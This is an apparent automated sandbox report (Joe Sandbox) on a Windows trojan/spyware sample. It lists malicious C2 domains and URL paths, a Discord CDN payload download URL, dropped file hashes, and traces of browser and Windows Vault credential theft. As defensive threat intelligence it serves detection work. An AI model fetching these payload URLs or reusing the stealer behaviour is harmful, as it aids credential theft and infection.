http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000003.00000002.922678107.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.192.24.139	www.joomlas123.info	United States		22612	NAMECHEAP-NETUS	true
162.159.134.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	403818
Start date:	04.05.2021
Start time:	12:31:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	f97e137e_by_Libranalysis (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/9@6/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.5% (good quality ratio 25.8%) Quality average: 75% Quality standard deviation: 30.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.107.246.254, 104.43.193.48, 52.147.198.201, 13.64.90.137, 20.82.210.154, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129 TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, t-ring.msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, blobcollector.events.data.trafficmanager.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:32:24	API Interceptor	2x Sleep call for process: f97e137e_by_Libranalysis.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
199.192.24.139	New order.04272021.DOC.exe	Get hash	malicious	Browse	www.joomlas123.info/3nop/?EvR85L=hBjlaxTH1Ha&ArR=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpNEr19LQe7mQ+0IHiQ==
	#U0441#U0447#U0435#U0442-#U043f#U0440#U043e#U0444#U043e#U0440#U043c#U0430 pdf.exe	Get hash	malicious	Browse	www.joomlas123.info/n7ak/
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse	www.joomlas123.info/3nop/?X2MxCnd0=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOo7pMXrZOPB&Ezr=UVIxmz00MxMt
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	www.joomlas123.info/n7ak/
	PO_98276300.exe	Get hash	malicious	Browse	www.psm-gen.com/ame8/?Cb=hN98bjZH&8p=atEp9HmZAS1HtoOZmTHK+Mkht0pNqxkiDqK4GuvFFh3swg7bz1pQN9/xGbnnC470xPoO
	PO2364#FD212003.exe	Get hash	malicious	Browse	www.psm-gen.com/p95n/?-Z=V6ALdRq0&v6=3x9Q4tu1mM1mfOGCS5myv3Ovs0F4IhtiWoTamKkI+VHOWU/+l6jpIKxR/Zu1Jtkg0uvX
162.159.134.233	VMKwliCGEP.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	Remittance Advice pdf.exe	Get hash	malicious	Browse	162.159.130.233
	0d69e4f6_by_Libranalysis.xls	Get hash	malicious	Browse	162.159.129.233
	6de2089f_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.133.233
	Almadeena-Bakery-005445536555665445.scr.exe	Get hash	malicious	Browse	162.159.129.233
	To1sRo1E8P.exe	Get hash	malicious	Browse	162.159.130.233
	wNgiGmsOwT.exe	Get hash	malicious	Browse	162.159.129.233
	BhTxt5BUvy.exe	Get hash	malicious	Browse	162.159.133.233
	rSYbV3jx0K.exe	Get hash	malicious	Browse	162.159.129.233
	04282021.DOC.exe	Get hash	malicious	Browse	162.159.130.233
	SkKcQaHEB8.exe	Get hash	malicious	Browse	162.159.130.233
	P20200107.DOC	Get hash	malicious	Browse	162.159.130.233
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	162.159.130.233
	New order.04272021.DOC.exe	Get hash	malicious	Browse	162.159.134.233
	Payment-Confirmation_Copy.exe	Get hash	malicious	Browse	162.159.133.233
	Q264003.exe	Get hash	malicious	Browse	162.159.130.233
	Camscanner.New Order.09878766.exe	Get hash	malicious	Browse	162.159.135.233
	doc07621220210416113300.exe	Get hash	malicious	Browse	162.159.129.233
	REF # 166060421.doc	Get hash	malicious	Browse	162.159.133.233
	File Attached.exe	Get hash	malicious	Browse	162.159.133.233
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	162.159.130.233
www.joomlas123.info	New order.04272021.DOC.exe	Get hash	malicious	Browse	199.192.24.139
	#U0441#U0447#U0435#U0442-#U043f#U0440#U043e#U0444#U043e#U0440#U043c#U0430 pdf.exe	Get hash	malicious	Browse	199.192.24.139
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse	199.192.24.139
	#U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exe	Get hash	malicious	Browse	199.192.24.139
	acil siparis.exe	Get hash	malicious	Browse	198.54.112.96
	Slip-Scan-Kopie.exe	Get hash	malicious	Browse	198.54.112.96
	DOC_3022719.exe	Get hash	malicious	Browse	198.54.112.96
	Scan_ 034 (1).exe	Get hash	malicious	Browse	198.54.112.96
	El nuevo pedido esta en la lista adjunta.exe	Get hash	malicious	Browse	198.54.112.96
	sifaris pdf.exe	Get hash	malicious	Browse	198.54.112.96
	porosin#U00eb e ofert#U00ebs.exe	Get hash	malicious	Browse	198.54.112.96
	Angebot bestellen.exe	Get hash	malicious	Browse	198.54.112.96
	file.exe	Get hash	malicious	Browse	198.54.112.96
	offer order.exe	Get hash	malicious	Browse	198.54.112.96
	list of our new purchase order.exe	Get hash	malicious	Browse	198.54.112.96
	3e#U0433.exe	Get hash	malicious	Browse	198.54.112.96
	predracuna.exe	Get hash	malicious	Browse	198.54.112.96

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	heUGqZXAJv.exe	Get hash	malicious	Browse	198.54.126.101
	Proforma Invoice.exe	Get hash	malicious	Browse	198.54.116.236
	w73FtMA4ZTl9NFm.exe	Get hash	malicious	Browse	198.54.117.212
	Synchronoss Payment.html	Get hash	malicious	Browse	199.192.16.144
	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	198.54.122.60
	Receipt 309210k.exe	Get hash	malicious	Browse	199.193.7.228
	FROCH ENTERPRISE PROFILE.doc	Get hash	malicious	Browse	198.54.122.60
	purchase order.doc	Get hash	malicious	Browse	198.54.122.60
	LAjei2S8bg.exe	Get hash	malicious	Browse	198.54.122.60
	QEpa8OLm9Z.exe	Get hash	malicious	Browse	198.54.122.60
	calvary petroleum.doc	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PackedNET.405.1325.exe	Get hash	malicious	Browse	198.54.122.60
	PO#453882.exe	Get hash	malicious	Browse	199.193.7.228
	customer request.exe	Get hash	malicious	Browse	198.54.126.165
	PO #4568.exe	Get hash	malicious	Browse	162.0.229.222
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	Sidertaglio PO_20210305.doc	Get hash	malicious	Browse	198.54.122.60
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
CLOUDFLARENETUS	heUGqZXAJv.exe	Get hash	malicious	Browse	104.21.33.129
	6ccd0000.bilper.dll	Get hash	malicious	Browse	104.20.184.68
	6bae0000.bilper.dll	Get hash	malicious	Browse	104.20.184.68
	6c130000.da.dll	Get hash	malicious	Browse	104.20.184.68
	gNRcIqPGkE.exe	Get hash	malicious	Browse	104.21.21.140
	Halkbank_Ekstre_20210504_080203_744632.exe	Get hash	malicious	Browse	104.21.19.200
	3QHQELjQ1s.exe	Get hash	malicious	Browse	104.21.21.140
	EXPEDIENTE CSJVAA 20-43.js	Get hash	malicious	Browse	104.26.5.223
	valuePasteList.dll	Get hash	malicious	Browse	104.20.184.68
	Payment Invoice.pdf.exe	Get hash	malicious	Browse	104.23.98.190
	oiY37pLlj7.exe	Get hash	malicious	Browse	172.67.208.174
	MV RED SEA.docx	Get hash	malicious	Browse	172.67.8.238
	MV RED SEA.docx	Get hash	malicious	Browse	104.22.0.232
	TT1eJMw4qZ.exe	Get hash	malicious	Browse	172.67.135.135
	202139769574 Shipping Documents.exe	Get hash	malicious	Browse	23.227.38.74
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	104.21.64.132
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	172.67.151.10
	813oo3jeWE.exe	Get hash	malicious	Browse	104.23.98.190
	4GGwmv0AJm.exe	Get hash	malicious	Browse	23.227.38.32
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	104.26.13.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	e1df57de_by_Libranalysis.xls	Get hash	malicious	Browse	162.159.134.233
	MV RED SEA.docx	Get hash	malicious	Browse	162.159.134.233
	MyUY1HeWNL.exe	Get hash	malicious	Browse	162.159.134.233
	IMG-WA7905432.exe	Get hash	malicious	Browse	162.159.134.233
	catalog-1521295750.xlsm	Get hash	malicious	Browse	162.159.134.233
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	162.159.134.233
	Remittance Advice pdf.exe	Get hash	malicious	Browse	162.159.134.233
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	162.159.134.233
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	162.159.134.233
	Tree Top.html	Get hash	malicious	Browse	162.159.134.233
	PT6-1152.doc	Get hash	malicious	Browse	162.159.134.233
	s.dll	Get hash	malicious	Browse	162.159.134.233
	setup-lightshot.exe	Get hash	malicious	Browse	162.159.134.233
	s.dll	Get hash	malicious	Browse	162.159.134.233
	8a793b14_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	pic05678063.exe	Get hash	malicious	Browse	162.159.134.233
	6de2089f_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	e17486cd_by_Libranalysis.exe	Get hash	malicious	Browse	162.159.134.233
	Almadeena-Bakery-005445536555665445.scr.exe	Get hash	malicious	Browse	162.159.134.233
	Purchase Order comfirmation to issue INVOICE.html	Get hash	malicious	Browse	162.159.134.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	04282021.DOC.exe	Get hash	malicious	Browse
	apr.20.confirmaci#U0e02n SWIFT.exe	Get hash	malicious	Browse
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	04282021.DOC.exe	Get hash	malicious	Browse
	apr.20.confirmaci#U0e02n SWIFT.exe	Get hash	malicious	Browse
	Factura proforma, nuevo pedido.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.742830409323469
Encrypted:	false
SSDEEP:	192:zKNdbN1XcCQYb6Q1g7htLtQQkZW8vUzRiW+:z4N1Xcs6Q1g7vOrZW8vUzRiW+
MD5:	174A363BB5A2D88B224546C15DD10906
SHA1:	10D758A2A180829C47360AFD30BE09FB295E6452
SHA-256:	D7EE783F0D00335118F82314239B3A73A6CFCD406E8FAE9C052D620834E897A9
SHA-512:	684AB4E29D43F9D9C1B5FE01D30933BC41C78810BBC3B2F75D9CE7FA955851301B4868B455DC2819208DA88FE0D17F7B58BD2B384B2F72CDAB3131EB2C7DF677
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 04282021.DOC.exe, Detection: malicious, Browse Filename: apr.20.confirmaci#U0e02n SWIFT.exe, Detection: malicious, Browse Filename: Factura proforma, nuevo pedido.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:..:..:...^..:...^..:...^..:...^..:..:..:...^..:...^_.:...^..:..Rich.:..........................PE..L...E........................................ ....@..........................`...........@...... ...........................0..x....@.......................P..\.......T............................................0...............................text...<........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..\....P.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Vylsmojatnhhurydzinydclytxebehn[1] Download File
Process:	C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe
File Type:	data
Category:	downloaded
Size (bytes):	441344
Entropy (8bit):	7.050141619754031
Encrypted:	false
SSDEEP:	12288:8TJtLo39BtGicUYmQnCSWmNKZWRyOaypzdKs:8TJCW5mQnC4NK+yOaydZ
MD5:	01FAB0301E3B3BC050E457E954DB9790
SHA1:	1F5406D756C951B726F316FCA927EE43ADDEC5D9
SHA-256:	82E6502C1EF38D2B803EC6EB1F9479740541AFF394A6C0FDE319B332C9752513
SHA-512:	B6AFF8F2C2D5FCAC6CED9DC7FB1CD35CE3F41D43DF1A57EEDC9C1E5A9E6D21E7254DA5734253C52C83C86BDB3F7DD48FDBBEB610283CC2E6A6EEF4D6C04A2839
Malicious:	false
Reputation:	low
IE Cache URL:	https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydclytxebehn
Preview:	.cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..cc..cccccS..ccsccc.ccc.ccsccceccgcccccccgccccccccSiccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc.1ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc?..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc.1ecc.gcc3eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.742830409323469
Encrypted:	false
SSDEEP:	192:zKNdbN1XcCQYb6Q1g7htLtQQkZW8vUzRiW+:z4N1Xcs6Q1g7vOrZW8vUzRiW+
MD5:	174A363BB5A2D88B224546C15DD10906
SHA1:	10D758A2A180829C47360AFD30BE09FB295E6452
SHA-256:	D7EE783F0D00335118F82314239B3A73A6CFCD406E8FAE9C052D620834E897A9
SHA-512:	684AB4E29D43F9D9C1B5FE01D30933BC41C78810BBC3B2F75D9CE7FA955851301B4868B455DC2819208DA88FE0D17F7B58BD2B384B2F72CDAB3131EB2C7DF677
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 04282021.DOC.exe, Detection: malicious, Browse Filename: apr.20.confirmaci#U0e02n SWIFT.exe, Detection: malicious, Browse Filename: Factura proforma, nuevo pedido.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:..:..:...^..:...^..:...^..:...^..:..:..:...^..:...^_.:...^..:..Rich.:..........................PE..L...E........................................ ....@..........................`...........@...... ...........................0..x....@.......................P..\.......T............................................0...............................text...<........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..\....P.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogim.jpeg Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	106092
Entropy (8bit):	7.9293420081912815
Encrypted:	false
SSDEEP:	3072:EgWL1SFiBPzUObAoHt2cYVSND8ODvlEJm:fwAFiBYOXNISND82KJm
MD5:	53684258BBC3A4F8FE4DEC7F59A4A96E
SHA1:	69D5FDF59606CBBA497FA7F5ECD2CD94A233712B
SHA-256:	4BCBD79B08AB2A5D1E31D19205049A253FF0FC4FD30872B221DA5D32F7F75123
SHA-512:	CD24D29FFFC63C9DE8BBFDE094D51CB65C0B34919A2B0DB3B99E03B38EE6CF4BCC4C9761676E9D6E70C0CF29126020AAA42E5B4443514DB5159EAE2CC4870BC9
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......<Z5..........\|.w....v...2\|...v<.......7.....................s...u.....g.W......)ky..N...

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrg.ini Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.ini Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrv.ini Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.4775843810946587
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4uUNRQnEoY:MlIaExGNYvOI6x4JNRQZY
MD5:	681496E31D521F47506F016D597066E3
SHA1:	029D95C0973141814C261E4BB35481088AE46670
SHA-256:	7CAE99052E0A7FFA7781324D30152EE6383F79564D9B0627B2C2B5401F291281
SHA-512:	A7D76F01401E048F3561215BAB3D92B80C4594C4DC2C4CA15EEAA3E1D2CC0F96D20498E61B8405B4C88DC43DE978F75AAB425033CC5C75F24A0ED166CC4A2505
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.u.u.z.f.x.y.r.s.c.v.c.j.b.j.....A.u.t.:.......P.a.s.s.:.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms Download File
Process:	C:\Windows\explorer.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Tue May 4 09:34:20 2021, atime=Tue May 4 09:34:20 2021, length=8192, window=hide
Category:	modified
Size (bytes):	11904
Entropy (8bit):	3.204139800377744
Encrypted:	false
SSDEEP:	48:8oQcdOvmuosPs+HtdOmkDwdadRZmyQb9sP8B8/JR33dOKJAdWuqsP8AdO9dGttde:8ikt4dRZ0zOxpVWttsdRaxU
MD5:	C1C8C171B97BAEA8DBCE79BC5362991C
SHA1:	BF2CB6FE1128DC8F413DD201CC44F6F3540CCC62
SHA-256:	D6D7F86FFF7F41875BD410B19DC2D9ECAEB33FE577F35990B60B34AAE7B2516E
SHA-512:	247D2D2DDA1E33FEB12730CC3EF3A779CABCFB867CE64C4AA4B9E9029EA77C3DD2E36A9B5DCA084FF0153E6470F84BF384E2B7226B0F284DC7A5AFADF58C1C72
Malicious:	false
Preview:	L..................F...........,....5C...@..5C...@... ...........................P.O. .:i.....+00.../C:\.....................1......RKT..PROGRA~2.........L..RKT....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.......E...............-.......D...........-5.......C:\Program Files (x86)..`.......X.......computer..!a..%.H.VZAj.....KF............!a..%.H.VZAj.....KF...........r.......-...1SPSU(L.y.9K....-........................9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.607613285190326
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	f97e137e_by_Libranalysis.exe
File size:	823808
MD5:	f97e137e249bb393fd88b7dec1ddf9a2
SHA1:	09e3865d681b8670aa9a1ef184c06ca40927d94c
SHA256:	2f2c77d7bcd0fbf80b63b7b2e60b8192130c285bce2f946f021dee83954254e6
SHA512:	de554f995d7d94be652f0e5eb430745fa1329ed06d216b0b107c330831155d737fde91bd74835c3c6bdbf713fa16744fc555a922722886f5aaeb4d65fb0fa014
SSDEEP:	12288:EvDpkleW6jNtAJ1yQU5rl0yQso4e1cR4NvHaGgX6r/o75U/Oy/6:E7O4p/81yQU5rl0yPoKeNvajqeUD/
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b464e4d0f0d8cc60

Static PE Info

General
Entrypoint:	0x47d8bc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d2b6753f310b2222d9c1c0b1c05cd168

Entrypoint Preview

Instruction
push ebp
